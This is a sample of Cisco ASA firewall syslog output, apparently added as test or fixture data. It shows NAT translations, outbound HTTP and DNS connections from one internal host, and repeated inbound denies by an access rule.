+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for 
outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP 
connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: 
Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP 
translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 
(192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to 
inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30 +Oct 10 2018 12:34:56 localhost 
CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to 
outside:192.168.98.44/8300 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30 
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst 
inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 
